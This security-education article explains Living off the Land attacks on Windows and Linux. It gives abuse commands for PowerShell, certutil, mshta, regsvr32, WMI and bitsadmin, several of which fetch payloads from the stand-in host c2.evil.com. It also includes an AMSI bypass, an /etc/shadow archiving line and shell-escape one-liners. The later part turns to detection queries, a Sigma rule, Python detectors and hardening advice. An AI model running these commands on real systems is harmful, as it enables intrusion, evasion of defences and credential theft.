Living off the Land (LotL) - LOLBins and LOLBas
"Living off the Land" (LotL) refers to attack techniques in which attackers use only legitimate tools and utilities already present on the system (LOLBins = Living off the Land Binaries) instead of their own malware. By using PowerShell, WMI, certutil, regsvr32, mshta, and other built-in Windows tools, attackers evade antivirus detection and make forensic attribution more difficult. MITRE ATT&CK: T1218 (System Binary Proxy Execution).
Living off the Land is the stealth concept behind modern intrusions: no custom malware that could be detected; instead, the operating system is turned against itself. PowerShell is a command-line interpreter for administrators, and for attackers. certutil is a certificate management tool, and a downloader. WMI is a management interface, and a persistence mechanism. LOLBins turn every Windows computer into a potential attacker's toolkit.
LOLBins – Living off the Land Binaries
Known LOLBins and their potential uses:
PowerShell (powershell.exe / pwsh.exe):
MITRE: T1059.001
Intended purpose: Scripting, administration
Exploitation:
# Encoded Command (Base64) – avoids logging:
powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0AC...
# = Invoke-WebRequest http://c2.evil.com/payload.exe -OutFile shell.exe
# AMSI bypass:
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')|
?{$_}|%{$_.GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)}
# PowerShell Remoting for lateral movement:
Invoke-Command -ComputerName DC01 -ScriptBlock {whoami}
Enter-PSSession -ComputerName FileServer01
# Download + Execute (without file on disk):
IEX (New-Object Net.WebClient).DownloadString('http://c2.evil.com/payload.ps1')
WMI (Windows Management Instrumentation):
MITRE: T1047
Legitimate Purpose: Hardware queries, software management
Exploitation:
# Remote Process Execution:
wmic /node:192.168.1.10 /user:domain\admin /password:Pass123
process call create "cmd.exe /c calc.exe"
# Persistence via WMI Event Subscription:
# (Starts on system events – survives reboots!)
wmic /namespace:"\\root\subscription" path __EventFilter
create Name="PersistFilter", EventNamespace="root\cimv2",
QueryLanguage="WQL", Query="SELECT * FROM Win32_ModuleLoadTrace"
CertUtil (certutil.exe):
MITRE: T1105 (Ingress Tool Transfer)
Normal purpose: Certificate management, PKI
Misuse:
# Download files (bypasses simple proxy filters!):
certutil.exe -urlcache -split -f "http://c2.evil.com/payload.exe" payload.exe
# Base64 decoding:
certutil.exe -decode encoded.txt payload.exe
# (Attacker delivers Base64-encoded payload as a .txt file)
# Clearing the URL cache (covering tracks):
certutil.exe -urlcache -split -f "http://c2.evil.com/payload.exe" delete
MSHta (mshta.exe):
MITRE: T1218.005
Normal purpose: HTML Application Host (HTA files)
Abuse:
# Execute remote HTA:
mshta.exe "http://c2.evil.com/evil.hta"
# HTA = HTML + VBScript/JScript → full script access!
# Phishing: "Please open the HTA file" instead of .exe → often not blocked
regsvr32 (regsvr32.exe):
MITRE: T1218.010
Normal purpose: Register COM objects
Abuse (Squiblydoo):
# Load and execute a remote COM object:
regsvr32.exe /s /n /u /i:"http://c2.evil.com/evil.sct" scrobj.dll
# → SCT file contains JScript/VBScript
# → regsvr32 is signed by Microsoft → often bypasses AppLocker!
rundll32 (rundll32.exe):
MITRE: T1218.011
Normal purpose: Call DLL function
Abuse:
# Load URL to JavaScript as a DLL:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";...
# Execute custom DLL:
rundll32.exe C:\Users\Public\evil.dll,EntryPoint
wscript / cscript:
MITRE: T1059.005
Normal purpose: Execute VBScript/JScript
Abuse:
wscript.exe //B "\\share\payload.vbs" # Silent mode, no dialogs
BitsAdmin (bitsadmin.exe):
MITRE: T1197
Normal Purpose: Background Intelligent Transfer Service (Windows Update)
Abuse:
# Download:
bitsadmin /transfer "WindowsUpdate" /download /priority high
"http://c2.evil.com/payload.exe" "C:\Windows\Temp\payload.exe"
# Persistence: BITS jobs survive reboots!
LOLBas - Living off the Land-Based Scripts
Beyond Binaries - Scripts and Built-in Features:
Excel/Office Macros (MITRE T1566.001):
→ Phishing: .xlsm, .docm attachment with macro
→ Macro: certutil download + PowerShell execute
→ Not Office-specific: also possible with ODF documents in LibreOffice
Outlook Home Page Attack:
→ Registry: Set Outlook home page to evil.com
→ Persistence: Website loads every time Outlook starts
DLL Hijacking:
→ Legitimate application loads DLL from an insecure path
→ Attacker places their own DLL in the desired location
→ Application loads the attacker's DLL (no code signature required!)
LOLBAS Reference:
→ lolbas-project.github.io: complete list of all known LOLBins
→ 250+ documented Windows binaries with exploitation examples
→ Categories: Execute, Download, Upload, Compile, Copy, Decode
GTFOBins (Linux equivalent):
→ gtfobins.github.io: LOLBins for Linux
→ SUID exploitation, Sudo escape, capability usage
Examples:
# awk as a shell:
awk 'BEGIN {system("/bin/sh")}'
# tar for file exfiltration:
tar -cf /tmp/loot.tar /etc/shadow
# Python for reverse shell:
python3 -c 'import socket,os,pty;s=socket.socket(...)'
Detection of LotL attacks
How EDR/SIEM detects LotL attacks:
Enable PowerShell logging:
# Group Policy: Computer Configuration → Administrative Templates → Windows Components → PowerShell
Turn on Module Logging: ENABLED (all commands)
Turn on PowerShell Script Block Logging: ENABLED (including obfuscated scripts)
Turn on Transcription: ENABLED (everything in log file)
# Event Log: Microsoft-Windows-PowerShell/Operational
# Event ID 4104: Script Block Logging (the actual command content)
# Event ID 4103: Module Logging
# Suspicious PowerShell patterns (Sentinel KQL):
SecurityEvent
| where EventID == 4104
| where ScriptBlockText has_any
("FromBase64String", "IEX", "Invoke-Expression",
"DownloadString", "WebClient", "AmsiUtils",
"Bypass", "HideWindow", "EncodedCommand")
| project TimeGenerated, Computer, ScriptBlockText
WMI Monitoring:
# Sysmon Event ID 19-21: WMI Event Subscription
# Event ID 20: WMI EventFilter + Consumer: Persistence!
Get-WMIObject -Namespace "root\subscription" -Class __EventFilter
# → If there are unknown filters: Investigate!
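Added example, not from the original page: a Python triage of the three root\subscription classes that joins __FilterToConsumerBinding records to their filter query and consumer, skips the default SCM Event Log binding that Windows ships with, and flags consumer classes that execute code. The records are constructed stand-ins for Get-WmiObject output; only the WMI class and property names are real.

```python
import re

# Constructed records (not real output) shaped like the root\subscription classes Get-WmiObject returns:
# __EventFilter (name -> WQL), consumer subclasses ((class, name) -> command) and __FilterToConsumerBinding.
FILTERS = {
    "SCM Event Log Filter": "select * from MSFT_SCMEventLogEvent",
    "PersistFilter": "SELECT * FROM Win32_ModuleLoadTrace",
}
CONSUMERS = {
    ("NTEventLogEventConsumer", "SCM Event Log Consumer"): None,
    ("CommandLineEventConsumer", "PersistConsumer"): r"cmd.exe /c C:\Users\Public\run.bat",
}
BINDINGS = [
    (r'\\.\root\subscription:__EventFilter.Name="SCM Event Log Filter"',
     r'\\.\root\subscription:NTEventLogEventConsumer.Name="SCM Event Log Consumer"'),
    (r'__EventFilter.Name="PersistFilter"', r'CommandLineEventConsumer.Name="PersistConsumer"'),
]

# Consumer classes that execute whatever their creator supplied once the filter fires.
CODE_EXECUTING = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}
# The one binding a default Windows install ships with; everything else is worth a look.
KNOWN_GOOD = {("SCM Event Log Filter", "SCM Event Log Consumer")}

def parse_ref(ref):
    """Split a WMI object path such as __EventFilter.Name="X" (namespace prefix optional) into (class, name)."""
    m = re.search(r'(\w+)\.Name="([^"]+)"$', ref)
    if not m:
        raise ValueError(f"unexpected WMI reference: {ref}")
    return m.group(1), m.group(2)

def triage_bindings(bindings, filters, consumers):
    """Join each binding to its filter and consumer; return one finding per binding not on the baseline."""
    findings = []
    for filter_ref, consumer_ref in bindings:
        _, fname = parse_ref(filter_ref)
        cclass, cname = parse_ref(consumer_ref)
        if (fname, cname) in KNOWN_GOOD:
            continue
        findings.append({
            "filter": fname,
            "query": filters.get(fname, "<filter object missing>"),
            "consumer": f"{cclass}.{cname}",
            "executes_code": cclass in CODE_EXECUTING,
            "command": consumers.get((cclass, cname)),
        })
    return findings

if __name__ == "__main__":
    for finding in triage_bindings(BINDINGS, FILTERS, CONSUMERS):
        print(finding)
```

A finding whose consumer class executes code and whose filter query fires on a frequent event (process start, module load) is the classic persistence shape described above.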
Sigma rule for LotL:
title: Living off the Land - CertUtil Download
id: xxx
status: stable
description: CertUtil used for file download (LOLBin abuse)
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\certutil.exe'
    CommandLine|contains|all:   # all three substrings must be present; a plain list would match any one of them
      - '-urlcache'
      - '-split'
      - 'http'
  condition: selection
level: medium
tags:
  - attack.ingress_tool_transfer
  - attack.t1105
EDR Detection Mechanisms:
→ Behavioral Detection: PowerShell → Network → Exec → Persistence = Suspicious!
→ Process Tree: Word.exe → powershell.exe → curl.exe → SUSPICIOUS
→ Script Analysis: PowerShell script block is checked against patterns
→ API Monitoring: Suspicious API calls (VirtualAlloc + WriteProcessMemory)
→ Parent-Child Anomalies: Excel spawns cmd.exe → ALERT!
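As an added example (not part of the original page), a small Python detector that applies the certutil Sigma selection above and the Office parent-child check to constructed process_creation events, and decodes -EncodedCommand arguments the way Script Block Logging exposes them. Field names follow Sysmon Event ID 1; all sample paths, URLs and commands are made up.

```python
import base64
import re

# Constructed process_creation events (not real telemetry); field names follow Sysmon Event ID 1.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -enc " + base64.b64encode(
         "Invoke-WebRequest http://example.invalid/p.exe -OutFile p.exe".encode("utf-16le")).decode()},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": 'certutil.exe -urlcache -split -f "http://example.invalid/p.exe" p.exe'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -verify cert.cer"},  # legitimate use, must not alert
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

def decode_encoded_command(cmdline):
    """Return the plaintext of a -enc/-EncodedCommand argument (UTF-16LE in Base64), or None."""
    m = re.search(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def evaluate(event):
    """Return the alert tags raised by one process_creation event (empty list = nothing suspicious)."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"]
    alerts = []
    # Sigma selection: certutil.exe with -urlcache AND -split AND http on the command line
    if image == "certutil.exe" and all(t in cmd.lower() for t in ("-urlcache", "-split", "http")):
        alerts.append("certutil_download (attack.t1105)")
    # Parent-child anomaly: an Office application spawning a shell or script host
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        alerts.append(f"office_spawns_{image} (parent-child anomaly)")
    # Encoding hides nothing from the analyst: decode the argument and attach the plaintext to the alert
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        alerts.append(f"encoded_powershell: {decoded}")
    return alerts

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["Image"].rsplit("\\", 1)[-1], "->", evaluate(ev) or "clean")
```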
Hardening against LotL:
□ PowerShell: Enforce Constrained Language Mode
# Per-session setting, useful for testing only (a user can simply start a new, unrestricted session):
$ExecutionContext.SessionState.LanguageMode = 'ConstrainedLanguage'
# System-wide enforcement comes from a deployed WDAC or AppLocker script policy, which PowerShell honours automatically
# Drastically limits PowerShell capabilities: no arbitrary .NET types, no Add-Type, no COM objects
□ WDAC (Windows Defender Application Control):
→ Run only signed applications (AppLocker successor)
→ LOLBins can be explicitly blocked (e.g., mshta.exe)
□ Attack Surface Reduction (ASR) Rules (Microsoft Defender):
Block abuse of exploited vulnerable signed drivers
Block credential theft from LSASS
Block Office applications from spawning child processes
Block execution of potentially obfuscated scripts
□ Logging: Enable Script Block Logging + Process Command Line Logging
□ Monitoring: EDR with behavioral detection (CrowdStrike, Defender for Endpoint)